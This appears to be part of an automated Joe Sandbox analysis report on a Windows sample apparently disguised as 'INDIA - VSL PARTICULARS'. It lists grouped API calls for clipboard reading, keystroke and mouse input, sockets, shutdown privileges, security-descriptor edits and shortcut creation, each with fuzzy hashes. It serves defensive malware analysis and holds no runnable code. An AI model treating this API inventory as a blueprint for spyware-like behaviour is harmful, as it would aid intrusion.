                              • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                              • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                              • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                              • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                              • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                              • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                              • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                              • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                              • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: FolderPath$LocalTime__swprintf
                              • String ID: %.3d
                              • API String ID: 3337348382-986655627
                              • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                              • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                              • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                              • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                              APIs
                              • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                              • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                              • FindClose.KERNEL32(00000000), ref: 0044291C
                              • FindClose.KERNEL32(00000000), ref: 00442930
                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                              • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                              • FindClose.KERNEL32(00000000), ref: 004429D4
                                • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                              • FindClose.KERNEL32(00000000), ref: 004429E2
                              Strings
                              Similarity
                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                              • String ID: *.*
                              • API String ID: 2640511053-438819550
                              • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                              • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                              • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                              • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                              APIs
                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                              • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                              • GetLastError.KERNEL32 ref: 00433414
                              • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                              • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                              • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                              Strings
                              Similarity
                              • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                              • String ID: SeShutdownPrivilege
                              • API String ID: 2938487562-3733053543
                              • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                              • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                              • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                              • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                              APIs
                                • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                              • GetLengthSid.ADVAPI32(?), ref: 004461D0
                              • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                              • GetLengthSid.ADVAPI32(?), ref: 00446241
                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                              • CopySid.ADVAPI32(00000000), ref: 00446271
                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                              Similarity
                              • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                              • String ID:
                              • API String ID: 1255039815-0
                              • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                              • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                              • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                              • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                              APIs
                              • __swprintf.LIBCMT ref: 00433073
                              • __swprintf.LIBCMT ref: 00433085
                              • __wcsicoll.LIBCMT ref: 00433092
                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                              • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                              • LockResource.KERNEL32(00000000), ref: 004330CA
                              • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                              • LoadResource.KERNEL32(?,00000000), ref: 00433105
                              • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                              • LockResource.KERNEL32(?), ref: 00433120
                              Similarity
                              • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                              • String ID:
                              • API String ID: 1158019794-0
                              • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                              • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                              • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                              • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                              APIs
                              Similarity
                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                              • String ID:
                              • API String ID: 1737998785-0
                              • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                              • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                              • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                              • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                              • GetLastError.KERNEL32 ref: 0045D6BF
                              • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                              Strings
                              Similarity
                              • API ID: Error$Mode$DiskFreeLastSpace
                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                              • API String ID: 4194297153-14809454
                              • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                              • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                              • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                              • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                              APIs
                              Strings
                              Similarity
                              • API ID: _memmove$_strncmp
                              • String ID: @oH$\$^$h
                              • API String ID: 2175499884-3701065813
                              • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                              • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                              • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                              • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                              APIs
                              • socket.WSOCK32(00000002,00000001,00000006), ref: 0046530D
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                              • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                              • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                              • closesocket.WSOCK32(00000000), ref: 00465377
                              • listen.WSOCK32(00000000,00000005), ref: 00465381
                              • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                              • closesocket.WSOCK32(00000000), ref: 004653BD
                              Similarity
                              • API ID: ErrorLast$closesocket$bindlistensocket
                              • String ID:
                              • API String ID: 540024437-0
                              • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                              • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                              • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                              • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                              Strings
                              Similarity
                              • API ID:
                              • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                              • API String ID: 0-2872873767
                              • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                              • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                              • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                              • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                              • __wsplitpath.LIBCMT ref: 00475644
                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                              • _wcscat.LIBCMT ref: 00475657
                              • __wcsicoll.LIBCMT ref: 0047567B
                              • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                              • CloseHandle.KERNEL32(00000000), ref: 004756BA
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                              • String ID:
                              • API String ID: 2547909840-0
                              • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                              • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                              • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                              • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                              • Sleep.KERNEL32(0000000A), ref: 0045250B
                              • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                              • FindClose.KERNEL32(?), ref: 004525FF
                              Strings
                              Similarity
                              • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                              • String ID: *.*$\VH
                              • API String ID: 2786137511-2657498754
                              • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                              • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                              • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                              • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                              APIs
                              • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                              • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                              • TerminateProcess.KERNEL32(00000000), ref: 00422004
                              Strings
                              Similarity
                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                              • String ID: pqI
                              • API String ID: 2579439406-2459173057
                              • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                              • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                              • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                              • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                              APIs
                              • __wcsicoll.LIBCMT ref: 00433349
                              • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                              • __wcsicoll.LIBCMT ref: 00433375
                              • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __wcsicollmouse_event
                              • String ID: DOWN
                              • API String ID: 1033544147-711622031
                              • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                              • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                              • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                              • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                              APIs
                              • GetKeyboardState.USER32(?), ref: 0044C3D2
                              • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                              • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                              • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                              • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: KeyboardMessagePostState$InputSend
                              • String ID:
                              • API String ID: 3031425849-0
                              • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                              • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                              • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                              • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                              APIs
                                • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                              • socket.WSOCK32(00000002,00000002,00000011), ref: 0047666F
                              • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorLastinet_addrsocket
                              • String ID:
                              • API String ID: 4170576061-0
                              • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                              • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                              • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                              • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                              APIs
                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                              • IsWindowVisible.USER32 ref: 0047A368
                              • IsWindowEnabled.USER32 ref: 0047A378
                              • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                              • IsIconic.USER32 ref: 0047A393
                              • IsZoomed.USER32 ref: 0047A3A1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                              • String ID:
                              • API String ID: 292994002-0
                              • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                              • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                              • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                              • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                              APIs
                                • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                              • CoInitialize.OLE32(00000000), ref: 00478442
                              • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                              • CoUninitialize.OLE32 ref: 0047863C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                              • String ID: .lnk
                              • API String ID: 886957087-24824748
                              • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                              • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                              • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                              • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                              APIs
                              • OpenClipboard.USER32(?), ref: 0046DCE7
                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                              • GetClipboardData.USER32(0000000D), ref: 0046DD01
                              • CloseClipboard.USER32 ref: 0046DD0D
                              • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                              • CloseClipboard.USER32 ref: 0046DD41
                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                              • GetClipboardData.USER32(00000001), ref: 0046DD8D
                              • CloseClipboard.USER32 ref: 0046DD99
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                              • String ID:
                              • API String ID: 15083398-0
                              • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                              • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                              • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                              • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: U$\
                              • API String ID: 4104443479-100911408
                              • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                              • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                              • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                              • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                              • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Find$File$CloseFirstNext
                              • String ID:
                              • API String ID: 3541575487-0
                              • Opcode ID: f8ec562d354739d1813db85dcf23f13665d7d9b039f732a3c66120ad17a42715
                              • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                              • Opcode Fuzzy Hash: f8ec562d354739d1813db85dcf23f13665d7d9b039f732a3c66120ad17a42715
                              • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                              APIs
                              • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                              • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                              • FindClose.KERNEL32(00000000), ref: 004339EB
